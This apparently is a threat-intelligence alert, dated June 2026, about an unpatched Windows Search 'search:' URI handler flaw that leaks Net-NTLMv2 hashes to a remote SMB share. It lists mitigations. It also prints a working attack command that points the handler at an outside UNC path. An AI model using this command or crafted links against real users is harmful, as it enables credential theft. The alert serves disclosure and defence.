Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

Published:

3 juni 2026 om 10:18:52

Alert date:

3 juni 2026 om 11:00:50

Source:

thehackernews.com

Operating Systems, Zero-Day Vulnerabilities, Identity & Access

Cybersecurity researchers have disclosed an unpatched vulnerability in Windows Search URI handler that allows attackers to steal NTLMv2 hashes from users. The vulnerability is similar to CVE-2026-33829 which affected the Windows Snipping Tool's ms-screensketch URI handler. The newly discovered issue resides in the search: URI handler and represents a spoofing vulnerability that could expose sensitive authentication credentials to malicious actors.

Technical details

An unpatched vulnerability in Windows Search URI handler allows attackers to steal NTLMv2 hashes. Similar to CVE-2026-33829 in Windows Snipping Tool, this vulnerability exploits the search: URI handler using 'crumb=location:' parameter instead of 'filePath'. The URI handler fails to validate parameters and reaches out to any UNC path passed to it, triggering NTLM authentication and exposing the victim's Net-NTLMv2 hash. The attack uses the command format: start "" "search:query=test&crumb=location:\\10.0.1.100\share". Attackers can embed specially crafted links in web pages or email messages to induce users to click and connect to attacker-controlled SMB servers.

Mitigation steps:

Block outbound SMB (TCP/445 and TCP/139) on hosts that don't need it, enforce SMB signing so that captured hashes can't be relayed against internal services, and disable NTLM where applicable.

Affected products:

Windows Search URI handler
Windows Snipping Tool